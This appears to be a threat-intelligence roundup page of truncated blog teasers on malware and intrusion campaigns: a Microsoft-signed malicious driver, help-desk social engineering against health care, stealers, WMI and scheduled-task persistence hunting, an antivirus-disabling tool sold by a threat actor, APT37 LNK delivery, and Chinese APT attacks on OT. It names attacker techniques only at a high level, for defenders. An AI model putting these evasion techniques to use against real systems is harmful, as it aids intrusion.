In December 2023, Sophos X-Ops received a report of a false positive detection on an executable signed by a valid Microsoft Hardware Publisher Certificate. However, the version info for the supposedly clean file looked a little suspicious.

Figure 1: Version info of the detected file. Note the typos ‘Copyrigth’ and ‘rigths’

The file’s metadata indicates that it is a “Catalog Authentication Client Service” by “Catalog Thales ” – possibly an attempt to impersonate the legitimate company Thales Group.…

Read More

Key Points

In early April 2024, ReliaQuest investigated numerous similar incidents targeting customers in the health care sector. We concluded that these intrusions form part of a new campaign targeting health care organizations with the goal of accessing banking information. The attacks used social engineering techniques against help desk staff to bypass account access controls.…
Read More

The world of cyber security faces new and more complex threats every day. Among these threats, which we encounter anew each day, one of the most significant is malicious software designed to steal personal and corporate information, known as “stealers”. Stealers can be considered one of today’s unseen yet most dangerous corporate threats.…

Read More
What’s happening?

Given the intricate landscape of cybersecurity, the misuse of Windows Management Instrumentation (WMI) stands out as a pervasive threat. WMI facilitates centralized management of Windows devices by providing a consistent and well-documented interface that can be utilized by various management applications developed by Microsoft and third-party vendors.…

Read More

You can’t talk about hunting for persistence techniques without mentioning scheduled tasks. As in the case of persistence via Windows services, described in a previous blog post, techniques related to scheduled tasks also allow for the use of a dual approach to persistence hunting:

Both the creation and execution of tasks can be hunted with simple yet different hypotheses, so let’s dive in and explore them.…

Read More

When discussing Windows services and how to hunt for their abuse, it is worth mentioning that several threat hunting hypotheses can be leveraged. This is common in threat hunting in general and for persistence-related techniques in particular.

As a reminder, all our service-related hypotheses can be split into two main groups: Hunting for service creation (aka “establishment” or “installation”) and Hunting for service execution (sometimes after the service is created/established).…

Read More

When discussing Windows services and how to hunt for their abuse, it is worth mentioning that there are several threat hunting hypotheses that we can leverage. This is very common in threat hunting tradecraft in general and for persistence-related techniques in particular.

When you are dealing with Windows services techniques, all your hypotheses can be split into two big groups: Hunting for service creation (aka “establishment” aka “installation”) and Hunting for service execution (some time after the service was created/established).…

Read More

As cyber adversaries become more sophisticated, detecting and neutralizing potential threats before they can cause any harm has become a top priority for cybersecurity professionals. It is also why threat hunting is a crucial skill. By mastering the art of cyber threat hunting, security professionals can build a robust defense and shield their organization from the ever-persistent menace of cyber threats.…

Read More
Background

Huntress SOC analysts continue to see alerts indicating malicious activity on endpoints running MSSQL Server or MSSQL Express, either as stand-alone installations, or as part of a larger application package installation. A recent series of incidents across three endpoints running the Fortinet Enterprise Management Server (EMS) system were initiated by alerts as illustrated in Figure 1.…

Read More

Threat Actor: 🔥

Victim: 🎯

Information: – The threat actor is offering the source code of AvEleminator software for sale. – AvEleminator is a tool designed for malicious purposes, aiming to neutralize antivirus, endpoint protection platforms, and endpoint detection and response security software. – The tool operates using certified signed drivers to bypass or disable security measures.…

Read More
Executive Summary Impersonating North Korea-related questionnaires, manuscript materials, security columns, contributions, monthly magazines, etc. Delivered by hiding an LNK type malicious file inside a ZIP compressed file Exploiting cloud storage such as DropBox, pCloud, etc. as a base for attack APT37 group’s ongoing RoKRAT fileless attacks Early detection of LNK and PowerShell stages with Genian EDR 1.…
Read More
Threat Landscape

The encryptor has hit the scene recently, but without any notable leak site from the threat actor or typical ransomware branding. The ransomware note is not unique in the wording used, but it is clear the threat actor is masquerading as a pentester. This tactic has been used by other threat actors in the past and is not going to fool the victim when they come across the ransomware note on an encrypted system.…

Read More

Key Points

This report examines the threat posed by Chinese advanced persistent threat (APT) groups on operational technology (OT) by analyzing four key cyber attacks from the past 12 months conducted by threat actors with a China nexus (“APT27,” “APT31,” “BlackTech,” and “Volt Typhoon”). Network defenders may find the detection rules and key recommendations detailed throughout this report useful.…
Read More